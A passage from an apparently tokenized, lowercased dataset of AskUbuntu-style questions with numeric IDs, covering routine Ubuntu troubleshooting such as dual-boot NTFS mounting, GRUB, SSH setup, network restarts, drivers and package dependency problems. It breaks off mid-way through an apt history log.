$ pidfile fi fi fi log_end_msg 0 ; ; ...
441615	using ubuntu 13.10 aside windows 8 fast boot	i 've been looking around for mounting ntfs partition on ubuntu with windows 8 dual boot . i 've found that the fast boot feature on w8 makes impossible to mount any ntfs in the same system . so , my question is if there is any possibility to mount ntfs partition and still using windows 8 fast boot feature to speed up boots ? i just do n't want to loose boot speed for mounting ntfs partitions .
441616	does ubuntu-sdk all programming language supports all mobile devices ?	ive installed ubuntu-sdk , and the main goal for this installation is to develop mobile apps , for all devices iphone/galaxy ... etc saw the project programming language select , html5 ... .python . can i develop mobile apps similar to phonegap ? best regards ,
441617	how to change the preset of the winff	i want to covert the files to avi using winff . in winff , the preset only has four options : ms compatible avi , xvid full screen , xvid widescreen , xvid widescreen anamoriphic . however , i want the preset to be xvid with option that can automatically detect the original video file to determine to use 'full screen ' or 'widescreen ' . how can i edit the preset ? thanks !
441619	how to successfully restart a network without reboot over ssh ?	in ubuntu 14.04 neither sudo service networking restart nor sudo /etc/init.d/networking restart do anything any more . they also both exit with code 1 . something has obviously changed ( or half changed ) but i ca n't find what . this obviously causes problems with remote network reconfiguration and tools like ansible . $ sudo bash -x /usr/sbin/service networking restart [ sudo ] password for wirehive : ++ basename /usr/sbin/service + version='service ver . 0.91-ubuntu1' ++ basename /usr/sbin/service + usage='usage : service < option > | -- status-all | [ service_name [ command | -- full-restart ] ] ' + service= + action= + servicedir=/etc/init.d + options= + ' [ ' 2 -eq 0 ' ] ' + cd / + ' [ ' 2 -gt 0 ' ] ' + case `` $ { 1 } '' in + ' [ ' -z '' -a 2 -eq 1 -a networking = -- status-all ' ] ' + ' [ ' 2 -eq 2 -a restart = -- full-restart ' ] ' + ' [ ' -z '' ' ] ' + service=networking + shift + ' [ ' 1 -gt 0 ' ] ' + case `` $ { 1 } '' in + ' [ ' -z networking -a 1 -eq 1 -a restart = -- status-all ' ] ' + ' [ ' 1 -eq 2 -a '' = -- full-restart ' ] ' + ' [ ' -z networking ' ] ' + ' [ ' -z '' ' ] ' + action=restart + shift + ' [ ' 0 -gt 0 ' ] ' + ' [ ' -r /etc/init/networking.conf ' ] ' + which initctl + grep -q upstart + initctl version + case `` $ { action } '' in + stop networking stop : job failed while stopping + : + exec start networking start : job is already running : networking what is the correct way to restart networking in ubuntu 14.04 server remotely ?
441620	how do you see what packages are available for downgrade ?	this question is just an opposite of how do you see what packages are available for update question . i want to check the answers in this question , is that the given answers really downgrade an installed package.it 's so hard to run apt-cache policy package command on each and every installed package and to manually check for the available low versions in the repository . so , is there any command to list all the installed packages which has a lower version available in the repositories ( packages which can be downgraded ) ?
441625	how can i determine where grub is loading its config	i have installed ubuntu on a touch laptop , its 64bit os with 32bit efi its working fine but i have to manually load grub . currently i type : set root= ( hd0 , gpt1 ) configfile /efi/ubuntu/grub.cfg this works but i have tried to copy the file onto various partitions and locations but it still does not boot the config . can anyone tell me how i can determine where grub is looking for the config so i can put it in the correct place .
441626	is it possible to hibernate ubuntu and run secondary os ?	is it possible to : hibernate ubuntu , run secondary os ( say windows 7 ) , shut down secondary os , resume hibernated ubuntu , or not ? ubuntu should ( afaik ) hibernate to swap partition , which is not used by windows . would it work ? if not , why ?
441627	how to edit a read-only archive ?	i have an archive type supported by file-roller and the properties for it have not been set to read-only . when i open it , however , i am unable to modify its contents as the file appears to be read-only . is there a way to fix this ? it 's only for this archive which i find strange .
441630	what is the command line equivalent to using nautilus to connect to a samba drive ?	to connect to a samba shared drive on my network , i can use nautilus , press ctrl+l and type in smb : //192.168.0.x , enter my credentials and am able to connect and browse the drive . how can i do the same thing from the command line ?
441631	`` sudo mv /fromdir /todir '' - not recognizing the fromdir location	i 'm trying to get a small folder ( /test ) with a couple small text files to a folder that i do n't have write permissions for . i 'm the sole user on this account and i do n't know why i would n't have access . my first attempt was to use the gui to create a folder but it is not a selectable option when i right click . when i look at the permissions for the folder i want to place my new folder it it the root 's and in the root group . i then tried writing the folder in the terminal which worked . sudo mkdir /opt/shiny-server/test so i tried writing the files to the folder but it seems there are many ways to do this and i am confused on what to do . assume i want to write a very simple text file that might have quotes , less than symbols and other characters in it . then i thought the easiest solution might be to just move a directory over using the command line . sudo mv /home/documents/test opt/shiny-server/ but there is `` no such directory '' for test folder even though i can see it in the gui . so this is a call for help to learn ubuntu ... i want to know how can i change the permission on this folder to write files and folders . what is the best way to write text file in a single instance in terminal using a cut paste approach ? what is wrong with my method for trying to move folders ? thanks ! working with 12.04 here .
441633	sshd activation on ubuntu system	i want to connect my work desktop computer remotely from home . i have read that ssh is used to connect to remote/server machine . when i was reading i came to know that to connect to a remote computer ( in my case my work computer ) , sshd should be enabled on it . how to check whether sshd is already enabled on my machine and if not how to enable it so that i can access it remotely from my home . hope to hear from you soon regards
441635	msi fx600 003us ubuntu 12.04lts camera	i 'm running ubuntu 12.04lts in my msi fx600 003us laptop and the os seems to be unable to detect the device itself . i 'm not really familiar with ubuntu so i might need some guidance in here in reference to what you might need for me to post in order to understand the issue . thanks in advance ! edit : lspci output 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 05 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gt216m [ geforce gt 325m ] ( rev a2 ) 06:00.0 network controller : intel corporation centrino wireless-n 1000 [ condor peak ] 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) 3f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 3f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 3f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 3f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 3f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 3f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) edit : lsusb output bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 003 : id 192f:0416 avago technologies , pte . bus 002 device 004 : id 5986:0262 acer , inc
441641	ca n't configure hotspot in ubuntu 13.10	yesterday i created a hotspot using these commands on my laptop : hotspot on kubuntu ( ubuntu 13.10 ) sudo add-apt-repository ppa : nilarimogard/webupd8 sudo apt-get update sudo apt-get install ap-hotspot sudo ap-hotspot configure sudo ap-hotspot start today i reinstalled ubuntu due to some issue with the os but now i am unable to create a hotspot . it 's giving me this error : root @ ghost-pc : ~ # ap-hotspot configure your wireless card does not support access point mode
441646	how to tune disk parameters in hdparm.conf by uuid ?	i have a disk that was spinning down too fast and /dev/sda { apm_battery = 254 } per how can i control hdd spin down time ? helped . the problem is that i plan on switching the disk in future . how can i make sure that apm_battery will affect only that specific disk ?
441649	failed to start scanner : error during device i/o with xsane	i am new on ubuntu and i need you help regarding my epson xp-212 scanner . i have ubuntu 13.04 . when i try to scan something with xsane over wifi , i have the following error message : failed to start scanner : error during device i/o . printing works perfectly and when i scan with simple scan , i works fine too . but i need multiple page scan . that 's why i try to use xsane . after xsane , when i try to use simple scan again , i have following error message : `failed to scan . no scanner available , please connect a scanner and my printer is on error too , all possible lights are blinking and wifi button is blicking green/orange . what can i do ? thank you for your help .
441650	install php 5.3.2 or any 5.3x on ubuntu 13.10	i am new to linux and installed ubuntu and apache2 by searching on internet . everything goes fine up to apache installation . now like to install php5.3.2 on searching found command libapache2-mod-php5 it seems this will install latest version of php which i do n't need . i have to work on a script that only support php 5.2 to 5.4 .
441651	can not install openssh-server or client	when i go to install , i get this error : sudo apt-get install openssh-server reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libxcb1 : depends : libxau6 but it is not going to be installed depends : libxdmcp6 but it is not going to be installed openssh-server : depends : openssh-client ( = 1:5.9p1-5ubuntu1 ) recommends : xauth but it is not going to be installed recommends : ssh-import-id but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i am running ubuntu 12.04.4 when i try to install the dependencies listed , it says i have the newest versions .
441657	why does unplugging usb affect hdmi ?	ubuntu 14.04 and gtx660 video card , and from time to time when i unplug my usb cables or plug them in , my hdmi port stops working . my hdmi port is running my second monitor . desktop tower , plugging in through rear or front usb connectors . one time my hdmi monitor would only work when my usb drive was plugged in .
441661	super resolution in gimp	does anyone have any tips on how to apply super resolution techniques in gimp ? i have done a lot of reading but i could not find any examples for gimp ...
441663	error when using juju client on windows 8.1 juju bootstrap to aws get aws acess key id you provided	question what could be the source of this error : error the aws access key id you provided does not exist in our records . setup : windows 8.1 running the 1.16.6 windows juju client access via command-line-window . what has been done so far : have a aws account setup have keys named correctly and installed in the .ssh directory have modified the .yaml file to have the access key and secret key edit 1 : - can create instances via ec2 console - can login to instances via ssh putty and key pairs - have setup user with iam including ec2 and s3 full access rights as per this link tried to follow the ec2 juju guide and it fails get the above error when issue the following command `` juju bootstrap '' if i use the command juju bootstrap -v it adds the following to the error : error juju supercommand.go:282 ... .. i have searched google and this forum but did n't find any other post that addressed this issue that i have n't already tried . what might i be missing ?
441664	no *stable* proprietary drivers ?	i am new to ubuntu and have taken the liberty of dual booting 12.04 with my windows 7 on a separate partition . everything went smooth , i downloaded all the updates and third party stuff etc . all i had to do was download drivers for my graphics card . this is where things went downhill . i searched for additional drivers and it only gave me two things : -internet adapter drivers -amd proprietary drivers experimental beta now , i was planning on going with the experimental beta seeing as how it was the only one , but research showed me that it , being experimental , was pretty unstable . out of options i looked around and found a way to install drivers without the need for ubuntu 's driver service . i downloaded a new driver , did a check , then rebooted . this completely screwed up my ubuntu and caused it to freeze every-time i hit the ubuntu loading screen . i have n't re-installed since and do not plan to unless i get an answer for this : what should i do for my graphics driver ? go with experimental ? or go through a confusing terminal process ? about my gpu : amd hd 6770 1gb gddr5 the ubuntu 12.04 i installed is 64 bit .
441666	user not known while configuring glance-registry	i am trying to install glance-registry but keep getting the following error $ sudo apt-get install glance-registry ... do you want to continue [ y/n ] ? y setting up glance-registry ( 2012.1.3+stable-20130423-74b067df-0ubuntu1 ) ... su : user not known to the underlying authentication module dpkg : error processing glance-registry ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : glance-registry e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ i am not sure what to do at this point . any suggestions ? this is on a following vm : $ uname -a linux ubuntu-server-12-203670 3.5.0-23-generic 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux
441667	64 bit fails to load-get a 32bit os instead	i have a new 64 bit computer that i finished building yesterday . i am using the ubuntu disk that came with the book 'ubuntu unleashed ' . it has loaded a 32 bit os three times in a row . any help ?
441668	programs for editing videos ?	i 'd like to find a video editor software that 's compatible with ubuntu . i 'd like it to have tons of effects and supports a mp4 video format .
441670	ca n't handle tinychat broadcasting option	i was hanging on the website bobisnothing.com and i want to use webcam of my laptop in order to make a broadcasting . but when i click on the button `` start broadcasting '' i have to click `` allow '' to start it . but in the settings of this tinychat i cant even touch any button ! i tried to do it in a winxp and win 8 computer and it worked well . it acts like it is a whole picture . i cant even close it after i open it . i have to click allow button but i cant . any idea to solve it ? thanks advancee .
441674	grub problem while installing ubuntu 12.04	i was trying to dual boot windows 8 with a linux os.when i tried installing ubuntu 12.04 . the installer worked fine until at the end when it gave an error saying that a package grub can not be installed and thus installed os can not be booted . and then the installation aborted . how can i resolve this issue ? any help regarding this problem would be much appreciated . thanks !
441678	no grub menu after installing ubuntu 12.04	i was trying to dual boot windows 8 with ubuntu . after the successful installation , when computer restarts then windows start directly without giving me any option . i then used this application to retore the grub menu : http : //sourceforge.net/projects/boot-repair-cd/ however it was of no help as windows still start directly any help regarding this problem will be much appreciated . thanks ! edit : the link to the bootinfo report created by boot-repair can be found at : http : //m.uploadedit.com/b032/1396337361343.txt
441679	i want to associate a file type to an installed program ( deluge ) , but it does n't appear in the `` open with '' menu .	i am trying to associate magnet links to deluge , but it does n't appear in the `` choose program to open with '' menu , or the `` more programs '' menu . there is an option within deluge to associate magnet links with the program , but that does nothing . how do i get an installed program to appear in the `` open with '' menu if it is n't showing up ?
441681	okular does not fit in screen	i have some bug with okular and 32 bit ubuntu , screen 1024x600 . screen is small , 10 inches . just did update , problem still there . some of the pdf documents make okular window wider than it should be , and as a result scroll bar is not on the screen . i also get message at the bottom page bar `` 155x233 mm ( unknown portrait paper size ) '' . i think that precisely because of this message that window becomes wider-okular tries not to cut the message , and since message does not fit in the screen ( left end of message is also stuck at page arrow ) , okulars right side is off the screen . resizing the window is also limited to the very right end of the message . if i turn page bar off , problem disappears . pretty sure its a bug , but did not find it described anywhere .
441682	release upgrade to lts	i know that the option `` long term support releases only '' for the `` software sources/updates/show new distribution releases '' gui allows an upgrade between long term support releases ( community docs ) . moreover , in `` /etc/update-manager/release-upgrades '' can be read : note that this option should not be used if the currently-running release is not itself an lts release , since in that case the upgrader wo n't be able to determine if a newer release is available . from what i understand that if i select this option in 13.10 i wo n't be advertised about the incoming 14.04 lts release . i can not understand the reasoning behind this behavior or the limitation implied by the '' wo n't be able '' above . besides , should n't that be advised also in the gui ? thanks for your responses .
441683	ca n't boot up ubuntu anymore after installing mesa-utils package	so my laptop fan was being loud and i tried to fix it by installing mesa-utils : sudo apt-get install mesa-utils mesa-utils-extra in the installation it told me that some packages will be uninstalled during the installation of this package , and i said yes . now , i ca n't seem to boot up ubuntu anymore . it boots up to a black screen . in addition after the installation , it seemed like nothing would happen when i pressed the `` shutdown '' button under the settings icon in the top right corner . i do n't remember exactly what i removed and i also do n't know how i can reinstall the packages i removed , since i do n't think i have access to a terminal anymore . however , i do have access to a livecd , so i think i could use that . edit : after thinking about this , what might be the cause of the problem is that i now have a mesa package which does n't work with my integrated graphics card , thus the boot to the black screen . is there any way to revert these changes ? here is what happened when i tried to install mesa-utils : start-date : 2014-03-30 23:40:43 commandline : apt-get install mesa-utils mesa-utils-extra install : mesa-utils : amd64 ( 8.0.1+git20110129+d8f7d6b-0ubuntu2 ) , libegl1-mesa-drivers : amd64 ( 8.0.4-0ubuntu0.7 , automatic ) , libgl1-mesa-dri : amd64 ( 8.0.4-0ubuntu0.7 , automatic ) , libgl1-mesa-glx : amd64 ( 8.0.4-0ubuntu0.7 , automatic ) , libglapi-mesa : amd64 ( 8.0.4-0ubuntu0.7 , automatic ) , libopenvg1-mesa : amd64 ( 8.0.4-0ubuntu0.7 , automatic ) , libgbm1 : amd64 ( 8.0.4-0ubuntu0.7 , automatic ) , mesa-utils-extra : amd64 ( 8.0.1+git20110129+d8f7d6b-0ubuntu2 ) , libegl1-mesa : amd64 ( 8.0.4-0ubuntu0.7 , automatic ) , libwayland0 : amd64 ( 0.85.0-1ubuntu2 , automatic ) , libxcb-xfixes0 : amd64 ( 1.8.1-1ubuntu0.2 , automatic ) , libgles2-mesa : amd64 ( 8.0.4-0ubuntu0.7 , automatic ) , libllvm3.0 : amd64 ( 3.0-4ubuntu1 , automatic ) remove : libglapi-mesa-lts-quantal : amd64 ( 9.0.3-0ubuntu0.4~precise1 ) end-date : 2014-03-30 23:40:58 and maybe some related items : start-date : 2014-03-30 23:04:09 commandline : aptdaemon role='role-commit-packages ' sender=':1.72' install : linux-image-3.5.0-47-generic : amd64 ( 3.5.0-47.71~precise1 ) , linux-headers-3.5.0-47 : amd64 ( 3.5.0-47.71~precise1 ) , linux-headers-3.5.0-47-generic : amd64 ( 3.5.0-47.71~precise1 ) upgrade : libsmbclient : amd64 ( 3.6.3-2ubuntu2.9 , 3.6.3-2ubuntu2.10 ) , openssh-server : amd64 ( 5.9p1-5ubuntu1.1 , 5.9p1-5ubuntu1.2 ) , gwibber-service-identica : amd64 ( 3.4.2-0ubuntu2.3 , 3.4.2-0ubuntu2.4 ) , smbclient : amd64 ( 3.6.3-2ubuntu2.9 , 3.6.3-2ubuntu2.10 ) , thunderbird-locale-en-us : amd64 ( 24.3.0+build2-0ubuntu0.12.04.1 , 24.4.0+build1-0ubuntu0.12.04.1 ) , udisks : amd64 ( 1.0.4-5ubuntu2.1 , 1.0.4-5ubuntu2.2 ) , gnome-settings-daemon : amd64 ( 3.4.2-0ubuntu0.6.4 , 3.4.2-0ubuntu0.6.5 ) , libcupsfilters1 : amd64 ( 1.0.18-0ubuntu0.1 , 1.0.18-0ubuntu0.2 ) , thunderbird : amd64 ( 24.3.0+build2-0ubuntu0.12.04.1 , 24.4.0+build1-0ubuntu0.12.04.1 ) , libpython2.7 : amd64 ( 2.7.3-0ubuntu3.4 , 2.7.3-0ubuntu3.5 ) , firefox-globalmenu : amd64 ( 27.0.1+build1-0ubuntu0.12.04.1 , 28.0+build2-0ubuntu0.12.04.1 ) , gwibber-service-twitter : amd64 ( 3.4.2-0ubuntu2.3 , 3.4.2-0ubuntu2.4 ) , gwibber-service-facebook : amd64 ( 3.4.2-0ubuntu2.3 , 3.4.2-0ubuntu2.4 ) , libwbclient0 : amd64 ( 3.6.3-2ubuntu2.9 , 3.6.3-2ubuntu2.10 ) , libfwtsacpica1 : amd64 ( 14.02.00-0ubuntu0~p , 14.03.01-0ubuntu2~p ) , linux-image-generic-lts-quantal : amd64 ( 3.5.0.46.52 , 3.5.0.47.53 ) , libgnutls26 : amd64 ( 2.12.14-5ubuntu3.6 , 2.12.14-5ubuntu3.7 ) , python2.7 : amd64 ( 2.7.3-0ubuntu3.4 , 2.7.3-0ubuntu3.5 ) , gir1.2-gtk-3.0 : amd64 ( 3.4.2-0ubuntu0.6 , 3.4.2-0ubuntu0.7 ) , update-manager : amd64 ( 0.156.14.11 , 0.156.14.12 ) , librsvg2-common : amd64 ( 2.36.1-0ubuntu1 , 2.36.1-0ubuntu1.1 ) , update-manager-core : amd64 ( 0.156.14.11 , 0.156.14.12 ) , xkb-data : amd64 ( 2.5-1ubuntu1.3 , 2.5-1ubuntu1.5 ) , samba-common : amd64 ( 3.6.3-2ubuntu2.9 , 3.6.3-2ubuntu2.10 ) , linux-headers-generic-lts-quantal : amd64 ( 3.5.0.46.52 , 3.5.0.47.53 ) , libgtk-3-bin : amd64 ( 3.4.2-0ubuntu0.6 , 3.4.2-0ubuntu0.7 ) , firefox : amd64 ( 27.0.1+build1-0ubuntu0.12.04.1 , 28.0+build2-0ubuntu0.12.04.1 ) , openssh-client : amd64 ( 5.9p1-5ubuntu1.1 , 5.9p1-5ubuntu1.2 ) , libgtk-3-0 : amd64 ( 3.4.2-0ubuntu0.6 , 3.4.2-0ubuntu0.7 ) , sudo : amd64 ( 1.8.3p1-1ubuntu3.4 , 1.8.3p1-1ubuntu3.6 ) , libgwibber2 : amd64 ( 3.4.2-0ubuntu2.3 , 3.4.2-0ubuntu2.4 ) , libfwts1 : amd64 ( 14.02.00-0ubuntu0~p , 14.03.01-0ubuntu2~p ) , tzdata-java : amd64 ( 2013g-0ubuntu0.12.04 , 2014a-0ubuntu0.12.04 ) , libgail-3-0 : amd64 ( 3.4.2-0ubuntu0.6 , 3.4.2-0ubuntu0.7 ) , google-chrome-stable : amd64 ( 33.0.1750.117-1 , 33.0.1750.152-1 ) , firefox-locale-en : amd64 ( 27.0.1+build1-0ubuntu0.12.04.1 , 28.0+build2-0ubuntu0.12.04.1 ) , flashplugin-installer : amd64 ( 11.2.202.341ubuntu0.12.04.1 , 11.2.202.346ubuntu0.12.04.1 ) , initramfs-tools : amd64 ( 0.99ubuntu13.4 , 0.99ubuntu13.5 ) , libdvdnav4 : amd64 ( 4.2.0-1 , 4.2.0-1ubuntu0.1 ) , gwibber-service : amd64 ( 3.4.2-0ubuntu2.3 , 3.4.2-0ubuntu2.4 ) , linux-generic-lts-quantal : amd64 ( 3.5.0.46.52 , 3.5.0.47.53 ) , libfwtsiasl1 : amd64 ( 14.02.00-0ubuntu0~p , 14.03.01-0ubuntu2~p ) , tzdata : amd64 ( 2013g-0ubuntu0.12.04 , 2014a-0ubuntu0.12.04 ) , librsvg2-2 : amd64 ( 2.36.1-0ubuntu1 , 2.36.1-0ubuntu1.1 ) , python2.7-minimal : amd64 ( 2.7.3-0ubuntu3.4 , 2.7.3-0ubuntu3.5 ) , thunderbird-globalmenu : amd64 ( 24.3.0+build2-0ubuntu0.12.04.1 , 24.4.0+build1-0ubuntu0.12.04.1 ) , thunderbird-gnome-support : amd64 ( 24.3.0+build2-0ubuntu0.12.04.1 , 24.4.0+build1-0ubuntu0.12.04.1 ) , fwts : amd64 ( 14.02.00-0ubuntu0~p , 14.03.01-0ubuntu2~p ) , linux-libc-dev : amd64 ( 3.2.0-59.90 , 3.2.0-60.91 ) , samba-common-bin : amd64 ( 3.6.3-2ubuntu2.9 , 3.6.3-2ubuntu2.10 ) , ssh-askpass-gnome : amd64 ( 5.9p1-5ubuntu1.1 , 5.9p1-5ubuntu1.2 ) , gwibber : amd64 ( 3.4.2-0ubuntu2.3 , 3.4.2-0ubuntu2.4 ) , libssh-4 : amd64 ( 0.5.2-1ubuntu0.12.04.2 , 0.5.2-1ubuntu0.12.04.3 ) , libgwibber-gtk2 : amd64 ( 3.4.2-0ubuntu2.3 , 3.4.2-0ubuntu2.4 ) , fwts-efi-runtime-dkms : amd64 ( 14.02.00-0ubuntu0~p , 14.03.01-0ubuntu2~p ) , initramfs-tools-bin : amd64 ( 0.99ubuntu13.4 , 0.99ubuntu13.5 ) , cups-filters : amd64 ( 1.0.18-0ubuntu0.1 , 1.0.18-0ubuntu0.2 ) , libgtk-3-common : amd64 ( 3.4.2-0ubuntu0.6 , 3.4.2-0ubuntu0.7 ) , ca-certificates : amd64 ( 20111211 , 20130906ubuntu0.12.04.1 ) , thunderbird-locale-en : amd64 ( 24.3.0+build2-0ubuntu0.12.04.1 , 24.4.0+build1-0ubuntu0.12.04.1 ) start-date : 2014-03-30 23:35:10 commandline : aptdaemon role='role-commit-packages ' sender=':1.72' install : xserver-xorg-video-ati : amd64 ( 6.14.99~git20111219.aacbd629-0ubuntu2 , automatic ) , xserver-xorg-video-openchrome : amd64 ( 0.2.904+svn1050-1ubuntu0.1 , automatic ) , xserver-xorg-video-mga : amd64 ( 1.4.13.dfsg-4build2 , automatic ) , xserver-xorg-core : amd64 ( 1.11.4-0ubuntu10.14 , automatic ) , xserver-xorg-video-mach64 : amd64 ( 6.9.0-1build2 , automatic ) , xserver-xorg-video-trident : amd64 ( 1.3.4-2build2 , automatic ) , libgl1-mesa-glx : amd64 ( 8.0.4-0ubuntu0.7 , automatic ) , xserver-xorg-video-sis : amd64 ( 0.10.3-3build2 , automatic ) , xserver-xorg-video-qxl : amd64 ( 0.0.16-2ubuntu0.1 , automatic ) , xserver-xorg-video-siliconmotion : amd64 ( 1.7.5-1build2 , automatic ) , libglapi-mesa : amd64 ( 8.0.4-0ubuntu0.7 , automatic ) , xserver-xorg-video-savage : amd64 ( 2.3.3-1ubuntu1 , automatic ) , xserver-xorg-video-tdfx : amd64 ( 1.4.3-4build2 , automatic ) , xserver-xorg-video-intel : amd64 ( 2.17.0-1ubuntu4.4 , automatic ) , xserver-xorg-video-r128 : amd64 ( 6.8.1-5build2 , automatic ) , xserver-xorg-input-evdev : amd64 ( 2.7.0-0ubuntu1.2 , automatic ) , xserver-xorg-video-vesa : amd64 ( 2.3.0-7build2 , automatic ) , xserver-xorg-video-s3 : amd64 ( 0.6.3-4build2 , automatic ) , xserver-xorg-video-fbdev : amd64 ( 0.4.2-4ubuntu2 , automatic ) , xserver-xorg-video-nouveau : amd64 ( 0.0.16+git20111201+b5534a1-1build3 , automatic ) , xserver-xorg-video-neomagic : amd64 ( 1.2.5-2build2 , automatic ) , libgles2-mesa : amd64 ( 8.0.4-0ubuntu0.7 ) , xserver-xorg-video-sisusb : amd64 ( 0.9.4-2build2 , automatic ) , xserver-xorg-video-radeon : amd64 ( 6.14.99~git20111219.aacbd629-0ubuntu2 , automatic ) , xserver-xorg-video-cirrus : amd64 ( 1.3.2-4build1 , automatic ) remove : x11-apps : amd64 ( 7.6+5ubuntu1 ) , ubuntu-desktop : amd64 ( 1.267.1 ) , xserver-xorg-video-mach64-lts-quantal : amd64 ( 6.9.3-0ubuntu1~precise2 ) , xserver-xorg-video-trident-lts-quantal : amd64 ( 1.3.6-0ubuntu2~precise1 ) , xserver-xorg-video-sis-lts-quantal : amd64 ( 0.10.7-0ubuntu1~precise2 ) , x11-xserver-utils-lts-quantal : amd64 ( 7.7~3ubuntu1~precise1 ) , xserver-common-lts-quantal : amd64 ( 1.13.0-0ubuntu6.5~precise1 ) , xserver-xorg-video-modesetting-lts-quantal : amd64 ( 0.5.0-0ubuntu1~precise2 ) , xserver-xorg-input-synaptics-lts-quantal : amd64 ( 1.6.2-1ubuntu5~precise1 ) , xserver-xorg-input-evdev-lts-quantal : amd64 ( 2.7.3-0ubuntu2~precise1 ) , xserver-xorg-video-ati-lts-quantal : amd64 ( 6.99.99~git20120913.8637f772-0ubuntu1~precise2 ) , libxatracker1-lts-quantal : amd64 ( 9.0.3-0ubuntu0.4~precise1 ) , libgl1-mesa-glx-lts-quantal : amd64 ( 9.0.3-0ubuntu0.4~precise1 ) , xserver-xorg-input-vmmouse-lts-quantal : amd64 ( 12.9.0-0ubuntu3~precise1 ) , xserver-xorg-video-s3-lts-quantal : amd64 ( 0.6.5-0ubuntu1~precise1 ) , x11-session-utils : amd64 ( 7.6+2 ) , xserver-xorg-video-vesa-lts-quantal : amd64 ( 2.3.2-0ubuntu1~precise1 ) , xserver-xorg-video-tdfx-lts-quantal : amd64 ( 1.4.5-0ubuntu1~precise2 ) , xserver-xorg-video-fbdev-lts-quantal : amd64 ( 0.4.3-0ubuntu1~precise1 ) , xserver-xorg-video-nouveau-lts-quantal : amd64 ( 1.0.2-0ubuntu3~precise2 ) , x11-xfs-utils : amd64 ( 7.6+1 ) , libglapi-mesa-lts-quantal : amd64 ( 9.0.3-0ubuntu0.4~precise1 ) , xserver-xorg-video-mga-lts-quantal : amd64 ( 1.6.2-0ubuntu1~precise2 ) , xinit : amd64 ( 1.3.1-1 ) , xserver-xorg-video-sisusb-lts-quantal : amd64 ( 0.9.6-0ubuntu1~precise1 ) , xserver-xorg-video-vmware-lts-quantal : amd64 ( 12.0.2+git.e5ac80d8-0ubuntu1~precise2 ) , xserver-xorg-video-neomagic-lts-quantal : amd64 ( 1.2.7-0ubuntu1~precise1 ) , xserver-xorg-video-radeon-lts-quantal : amd64 ( 6.99.99~git20120913.8637f772-0ubuntu1~precise2 ) , xserver-xorg-video-openchrome-lts-quantal : amd64 ( 0.3.1-0ubuntu1~precise3 ) , xserver-xorg-video-cirrus-lts-quantal : amd64 ( 1.5.1-0ubuntu2~precise1 ) , xserver-xorg-input-wacom-lts-quantal : amd64 ( 0.17.0-0ubuntu2~precise1 ) , xorg : amd64 ( 7.6+12ubuntu2 ) , xserver-xorg-input-mouse-lts-quantal : amd64 ( 1.7.2-2build1~precise1 ) , xserver-xorg-input-all-lts-quantal : amd64 ( 7.7+1ubuntu4~precise1 ) , xserver-xorg-video-intel-lts-quantal : amd64 ( 2.20.9-0ubuntu2.3~precise1 ) , xserver-xorg-video-savage-lts-quantal : amd64 ( 2.3.6-0ubuntu1~precise1 ) , xserver-xorg-video-all-lts-quantal : amd64 ( 7.7+1ubuntu4~precise1 ) , libgl1-mesa-dri-lts-quantal : amd64 ( 9.0.3-0ubuntu0.4~precise1 ) , xserver-xorg-video-siliconmotion-lts-quantal : amd64 ( 1.7.7-0ubuntu1~precise1 ) , xserver-xorg-lts-quantal : amd64 ( 7.7+1ubuntu4~precise1 ) , xserver-xorg-core-lts-quantal : amd64 ( 1.13.0-0ubuntu6.5~precise1 ) , xserver-xorg-video-r128-lts-quantal : amd64 ( 6.9.1-0ubuntu1~precise2 ) end-date : 2014-03-30 23:36:09 start-date : 2014-03-30 23:38:28 commandline : aptdaemon role='role-commit-packages ' sender=':1.72' install : libglapi-mesa-lts-quantal : amd64 ( 9.0.3-0ubuntu0.4~precise1 ) remove : mesa-utils : amd64 ( 8.0.1+git20110129+d8f7d6b-0ubuntu2 ) , gnome-power-manager : amd64 ( 3.4.0-0ubuntu1.1 ) , unity : amd64 ( 5.20.0-0ubuntu3 ) , unity-2d : amd64 ( 5.14.0-0ubuntu2 ) , libwxbase2.8-0 : 